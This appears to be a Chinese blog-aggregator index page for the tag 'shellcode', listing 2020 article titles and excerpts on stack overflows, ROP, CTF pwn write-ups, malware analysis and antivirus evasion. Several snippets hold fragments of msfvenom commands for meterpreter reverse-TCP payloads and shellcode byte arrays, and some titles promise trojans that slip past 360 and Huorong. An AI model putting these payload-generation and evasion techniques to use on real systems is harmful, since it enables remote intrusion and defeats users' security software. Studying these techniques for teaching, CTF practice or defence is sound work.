shellcode

MSF生成meterpreter及静态免杀

1.静态免杀1.1编译c文件,静态免杀1.1.1生成shellcode在kali命令行输入msfvenom-pwindows/meterpreter/reverse_tcp-ex86/shikata_ga_nai-i12
斯利普·2020-06-26 13:41

shellcode之二:简述漏洞提权

声明:主要内容来自《TheShellcoder'sHandbook》,摘录重点作为笔记并加上个人的一些理解,如有错,请务必指出。
sepnic·2020-06-26 08:03

【免杀测试】Kali之Metasploit几款工具免杀练习

下面就尝试测试有关工具的免杀效果,三款工具为,shellter,Veil,Avet01shellterShellter采用了动态Shellcode注入来实现免杀的效果,当用户打开被植入后门的软
Sec朔方·2020-06-26 08:34

shellcode题总结

shellcode题总结有时shellcode受限,最好的方法一般就是勉强的凑出sysread系统调用来输入shellcode主体。下面从几个题来加深理解。
haivk·2020-06-26 07:55

一个栈溢出漏洞利用的病毒分析

样本概况样本基本信息利用VirusTotal扫描漏洞分析POC分析分析shellcode小结恶意代码分析样本概况样本基本信息病毒名称:doc_sampleMD5值:52E3DDB2349A26BB2F6AE66880A6130CSHA1
richard1230·2020-06-26 05:10

shecodject生成免杀木马,一步过360、火绒

使用python3shecodject.py功能介绍mpr生成msf有效shellcodemprrunexe生成shellcode后返回主界面生成exe文件run注意:记得设True,让exe程序运行时不会弹出控制台
被遗弃的盒子·2020-06-26 03:05

ROP之ret2libc

ROP之ret2libc修改返回地址,让其指向内存中已有的某个函数当函数调用栈的没有执行权限时,就不能执行我们自己写入的shellcode,就利用程序里或系统里的函数,libc动态链接库中通常就有需要的函数
酉酉囧·2020-06-25 21:00

远控免杀专题(29)-C#加载shellcode免杀-5种方式(VT免杀率8-70)

0x00免杀能力一览表几点说明:1、表中标识√说明相应杀毒软件未检测出病毒,也就是代表了Bypass。2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01),
go0dStudy·2020-06-25 21:10

Metasploit(后渗透攻击:操作系统后门)

1.Cymothoa后门Cymothoa是一款可以将ShellCode注入现有进程(即插进程)的后门工具。借助这种注入手段,,他能够把shellcode伪装成常规程序。
毕竟话少·2020-06-25 20:04

黑客攻防入门(五)通用的缓冲区漏洞攻击代码

#include#include#include#includecharshellcode[]=/*shellcodeexec/bin/sh*/"\xeb\x2b\x59\x55\x48\x89\xe5
屎壳郞·2020-06-25 17:47

XSS----shellcode的调用

shellcode、exploit、pocshellcode:最初是指溢出程序和蠕虫病毒核心,实际上是指利用漏洞所执行的一段代码Exploit:英文意思利用,编写好的漏洞利用工具或程序,具有攻击性Poc
丶喝咖啡的猫·2020-06-25 15:02

栈溢出学习(三)之简单ROP

前言栈溢出学习(三),讲述简单ROP实现栈溢出的原理及其实践方法系列文章栈溢出学习(一)之利用预留后门&return2shellcode栈溢出学习(二)之jmpesp&return2libc栈溢出学习(
Pz_mstr·2020-06-25 09:29

栈溢出学习(五)之NX,ASLR绕过方法

前言栈溢出学习(五)之NX,ASLR绕过方法,讲述NX,ASLR保护机制及其绕过方法系列文章栈溢出学习(一)之利用预留后门&return2shellcode栈溢出学习(二)之jmpesp&return2libc
Pz_mstr·2020-06-25 09:29

栈溢出学习(四)之Hijack GOT

前言栈溢出学习(四),讲述HijackGOT的基本原理及其利用ROPchain实现HijackGOT的方法系列文章栈溢出学习(一)之利用预留后门&return2shellcode栈溢出学习(二)之jmpesp
Pz_mstr·2020-06-25 09:29

PWN-shellcode获取与编写

当我们在获得程序的漏洞后,就可以在程序的漏洞处执行特定的代码,而这些代码也就是俗称的shellcode。而shellcode该怎么获得呢?
Jaken1223·2020-06-25 09:44

shellcode——payload分离免杀

QQ1285575001WechatM010527技术交流QQ群599020441纪年科技aming反病毒安全软件anti-virussecuritysoftware三种特点基于特征基于行为基于云查杀-特征查杀都是特别针对PE头文件的查杀当payload文件越大的时候,特征越容易查杀反制查杀机制(概括)采取特征与行为分离免杀避免PE头文件,并且分离行为,与特征的综合免杀适用于菜刀下等场景基于win
amingMM·2020-06-25 07:35

VirtualAlloc加载shellcode免杀一点记录

一个很好的学习网站推荐一下:https://docs.microsoft.com/zh-cn/windows/win32/api/0x01VirtualAllocVirtualAlloc:在虚拟地址空间中预定一块内存区域;VirtualAlloc是Windows提供的API,通常用来分配大块的内存。PVOIDVirtualAlloc(PVOIDpvAddress,SIZE_TdwSize,DWOR
卿's Blog·2020-06-25 00:04

使用python命令执行shell脚本(python3版本)

subprocess是Python3才有的包,因此代码运行环境必须python3+#useshellcodetogeneratetheresult#y4mtobmp:ffmpeg-ixx.y4m-vsync0xx
mdjxy63·2020-06-24 14:40

XSS篇之认识XSS

有黑客把XSS攻击看作是新型的缓冲区溢出攻击,而JavaScript是新型的ShellCode。最大的特点就是向页面注入恶意的程序或代码,以达到劫持用户会话,管理员cookie,留后门等目的。
D1stiny·2020-06-24 12:52

栈溢出攻击提权进入root shell

以前对栈溢出攻击只是一种感官上的,最近学了shellcode,才真切地感觉到了栈溢出攻击有多么危险。
痕枫冷·2020-06-24 11:30

ptrace之SMC,反调试

include#include#definePAGE_START(p)((p)&~4095)#definePAGE_END(p)((p)+PAGE_START(p))staticcharencrypt_shellcode
痕枫冷·2020-06-24 11:58

逆向工程核心原理读书笔记-代码注入

所以DLL注入技术主要用在代码量大且复杂的时候,而代码注入技术则适用于代码量小且简单的情况比如shellcode。下面我们先测试一下代码。运行notepad.exe并查看PID。在命令
H-KING·2020-06-24 06:56

使用shellcode打造MSF免杀payload及shellcode加载技术

0x00前言经常有同学提及MSFpayload的免杀问题,其实除了Veil之处,还有另一种比较轻巧的方案可以打造免杀的payload,那就是shellcode
jackey3Lin·2020-06-23 20:27

利用FS寄存器获取KERNEL32.DLL基址算法的证明

00CSubSystemTib010FiberData014ArbitraryUserPointer018FS段寄存器在内存中的镜像地址020进程PID024线程ID02C指向线程局部存储指针030PEB结构地址(进程结构)034上个错误号在shellcode
int2e·2020-06-23 18:49

(总结)Windows服务器被感染勒索病毒.adobe,目前数据已恢复

4、通过专业的安全数据恢复公司进行分析,该勒索病毒使用加密的shellcode,在shell
herod_xiao·2020-06-23 14:19

溢出漏洞扫描技术方法与实现

写了多篇溢出技术方面的文章,内容更多的是涉及漏洞调试、分析利用以及纯粹的ShellCode编写技巧。其实如果要掌握好一个溢出漏洞,漏洞的扫描技术也是同样重要的。
H2SO2H2SO2·2020-06-23 12:44

POC、EXP、Payload与Shellcode的区别

1.POC、EXP、Payload与Shellcode的区别POC:全称’ProofofConcept',中文’概念验证’,常指一段漏洞证明的代码。
一抹夏忧丶·2020-06-23 11:33

CTF-PWN Noleak (unsortedbin attack+fastbin attack+malloc_hook)

FullRELROStack:CanaryfoundNX:NXdisabledPIE:NoPIE(0x400000)RWX:HasRWXsegments发现没有开启NX保护,因此大概能猜到需要我们写入shellcode
SuperGate·2020-06-23 10:39

DEP原理及关闭

其基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。
淡淡的琉璃·2020-06-23 05:50

黑客攻防入门(二)shellcode构造

狭义的shellcode就是一段可以运行shell的代码!构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖掉正常的返回地址。
屎壳郞·2020-06-22 22:15

攻防世界 welpwn WP

这道题出的确实很wel拿到这题,查看保护发现shellcode走不通,一般都是走rop路线IDA打开,分析代码,发现main函数内调用了echo函数这里的buf有0x400大,但是main不存在栈溢出,
Zarcs_233·2020-06-22 10:44

开源一段可以全系统通用的ShellCode(XP~Win10)

unsignedcharbShellCode[]={0x33,0xC9,0x64,0x8B,0x71,0x30,0x8B,0x76,0x0C,0x8B,0x76,0x1C,0x8B,0x46,0x08,0x8B
Yalneh·2020-06-22 09:37

逆向之路(一) 代码节空白区添加代码

代码节空白区添加代码,以添加MessageBox为例:1..获取MessageBox地址,构造shellcode代码:OD->bpMessageBoxA->break断点有user32.dll的程序有MessageBox
Snippers·2020-06-22 05:33

【免杀测试】Kali之Metasploit几款工具免杀练习

下面就尝试测试有关工具的免杀效果,三款工具为,shellter,Veil,Avet01shellterShellter采用了动态Shellcode注入来实现免杀的效果,当用户打开被植入后门的软
Sec朔方·2020-06-22 05:46

C#加载shellcode

classProgram{staticvoidMain(string[]args){//nativefunction’scompiledcode//generatedwithmetasploitbyte[]shellcode
大囚长·2020-06-21 22:55

【免杀篇】远控免杀专题(65)-shellcode免杀实践补充

当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01前言0x02直接生成可执行文件0x03加密shellcode后生成可执行文件0x04dll劫持白加黑方式免杀流程图具体操作0x05利用工具自动劫持劫持微信演示
Agan '·2020-06-21 21:43

【免杀篇】远控免杀专题(29)-C#加载shellcode免杀-5种方式(VT免杀率8-70)

当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01C#加载shellcode免杀介绍0x02C#源码直接编译exe方法1:C#+shellcode直接编译(VT免杀率20/71)方法2:C#
Agan '·2020-06-21 21:12

攻防世界PWN之Nobug题解

Nobug首先,检查一下程序的保护机制PIE和NX没开,那么,我们可以轻松的布置shellcode到栈里或bss段或堆里,然后跳转。免去了泄露libc地址这些。
haivk·2020-06-21 07:12

那些shellcode免杀总结

首发先知:https://xz.aliyun.com/t/7170自己还是想把一些shellcode免杀的技巧通过白话文、傻瓜式的文章把技巧讲清楚。希望更多和我一样web狗也能动手做到免杀的实现。
卿's Blog·2020-06-21 04:17

PhpStudy“后门"文件php_xmlrpc.dll

该字符串所在的函数中通过调用PHP函数gzuncompress来解压相关shellcode数据。同时安全专家查看该文件
Api - 小柒·2020-06-21 04:46

shellcode 免杀(一)

工具免杀选择了几个简单或者近期还有更新的免杀工具进行学习ShellcodeWrapper项目地址https://github.com/Arno0x/ShellcodeWrapper该工具的原理是使用异或加密或者
sijidou·2020-06-19 19:00

exe转换shellcode

前言前些天听到团队在问有没有exe转换成shellcode的工具,然后拿来做免杀,然后我就突发奇想的一个念头。那既然找不到脚本为啥不自己去开发一个呢!!!
nice_0e3·2020-06-08 00:00

MS17-010漏洞利用工具系统入侵(实测)shellcode

MS17-010漏洞利用工具系统入侵与ShellCode(实测)文章目录MS17-010漏洞利用工具系统入侵与ShellCode(实测)实验环境第一步:安装环境第二步:测试两台虚拟机的互通性第三步:关闭
笙烛·2020-05-28 18:19

MSF木马的免杀(三)

目录MSF木马的免杀MSF木马的免杀MSF下输入,生成免杀shellcodemsfvenom-pwindows/meterpreter/reverse_tcp-ax86--platformwindowsLHOST
谢公子·2020-05-26 09:30

记录一下最近几天比较有趣的几个pwn题

题目开启沙盒并且不知道flag路径时的处理方法(whuctf-shellcode)题目开启沙盒并且free_hook和malloc_hook都被禁用时的处理情况(GKCTF-pwn1)libc2.29下的
cnitlrt·2020-05-25 18:07

kali 免杀工具shellter安装以及使用

Shellter是一款动态shellcode注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。
We3sT·2020-05-18 21:00

溢出

目录1.获取shellcode中API函数的地址2获取跳板3字符转十六进制4代码攻击结果图1.获取shellcode中API函数的地址MessageBoxA=0x77d507ea3a902获取跳板3字符转十六进制
2019李晨·2020-05-07 18:00

20199308 2019-2020-2 《网络攻防实践》第10周作业

1、软件安全概述1.1软件安全漏洞威胁1.2软件安全困境1.3软件安全漏洞类型2、缓冲区溢出2.1缓冲区溢出的基本概念2.2缓冲区溢出攻击背景知识2.3缓冲区溢出攻击原理3、Linux平台上的栈溢出与Shellcode3.1Linux
20199308黄思佳·2020-05-06 00:00

20199107 2019-2020-2 《网络攻防实践》第10次作业

目录201991072019-2020-2《网络攻防实践》第10次作业1.实践内容软件安全概述缓冲区溢出基础概念Linux平台上的栈溢出与shellcodeWindows平台上的栈溢出与shellcode
20199107hxx·2020-05-05 13:00

Linux PWN从入门到熟练

主要涉及到当堆栈开启了保护的时候,我们不能够直接将shellcode覆盖到堆栈中执行,而需要利用程序其他部分的可执行的小片段来连接成最终的shellcode。此小片段就是gadgets。
看雪学院·2020-04-14 04:59
上一页 11 12 13 14 15 16 17 18 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他